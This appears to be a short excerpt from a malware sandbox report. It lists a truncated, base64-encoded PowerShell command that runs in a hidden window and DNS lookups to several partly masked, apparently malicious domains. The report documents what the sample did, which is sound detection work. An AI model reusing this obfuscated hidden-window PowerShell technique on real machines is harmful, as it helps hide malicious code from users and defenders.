Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAAxADQANAAyAGUAMwA2AGEAOQA4ADkAYgA9ACcAYQAwAHgAOABmADAAYQAzAGEANgBmADIAYwA1ADYANAA5ADYAJwA7AC...
- DNS ASK bu##y.pl
- DNS ASK ra####ameleon.ba
- DNS ASK cc######wordpress.tw1.ru
- DNS ASK sm#####nitations.com
- DNS ASK gr#####eblickhotel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAAxADQANAAyAGUAMwA2AGEAOQA4ADkAYgA9ACcAYQAwAHgAOABmADAAYQAzAGEANgBmADIAYwA1ADYANAA5ADYAJwA7AC...' (with hidden window)